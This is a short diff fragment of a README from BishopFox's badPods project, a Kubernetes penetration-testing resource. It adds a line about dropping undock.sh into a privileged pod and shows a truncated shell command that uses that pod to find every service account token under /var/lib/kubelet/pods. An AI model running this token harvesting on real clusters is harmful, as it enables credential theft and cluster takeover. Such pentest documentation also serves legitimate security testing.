BishopFox/badPods/manifests/priv/README.md

 **Run kubectl can-i --list -n kube-system against ALL tokens found on the node**

 *Run this where you have kubectl installed, and NOT from within the priv pod.*
+*Make sure you already dropped undock.sh to the pod*
 ```
 tokens=`kubectl exec -it priv-exec-pod -- sh undock.sh """find /var/lib/kubelet/pods/ -name token -type l"""`; \
 for filename in $tokens; \